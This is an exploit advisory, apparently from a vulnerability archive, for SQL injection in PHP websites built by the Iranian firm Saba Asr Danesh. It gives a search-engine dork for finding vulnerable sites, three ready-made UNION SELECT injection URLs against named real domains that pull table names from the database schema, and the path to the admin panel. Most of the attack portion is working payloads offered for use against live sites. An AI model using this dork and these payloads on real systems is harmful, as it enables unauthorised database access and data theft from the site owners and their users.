شرکت صبا عصر دانش SQL Injection

2016.02.03
Credit: Milad_Inj3ct0r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: "طراحی و برنامه نویسی توسط شرکت صبا عصر دانش" inurl:"php?id="

[+][+][+][+][+][+][+][+] [+] Title: شرکت صبا عصر دانش SQL Injection [+] Dork: intext:"طراحی و برنامه نویسی توسط شرکت صبا عصر دانش" inurl:"php?id=" [+] Vendor Homepage: www.sabaisp.net [+] Author : Milad_Inj3ct0r [+] Date : Wednesday, February 03, 2016 [+] Tested On: windows 8.1 , Chrome [+][+][+][+][+][+][+][+] [+] Examples : [-] http://goleseyed.ir/learn.php?id=-20 union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database()--+ [-] http://pishgamanrahaee.ir/menu.php?id=-7' union select 1,2,3,table_name,5,6 from information_schema.tables where table_schema=database() limit 0,1--+ [-] http://goleseyed.ir/products.php?id=-38' union select 1,2,3,table_name,5,6 from information_schema.tables where table_schema=database() limit 0,1--+ [+][+][+][+][+][+][+][+] Admin Panel : [-] site.com/admin [+][+][+][+][+][+][+][+] [+] Thanks To : Kamran HeLlish , Dr.root , Dr.reprimand , Alireza_Promis , Sajjad Soutodeh


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top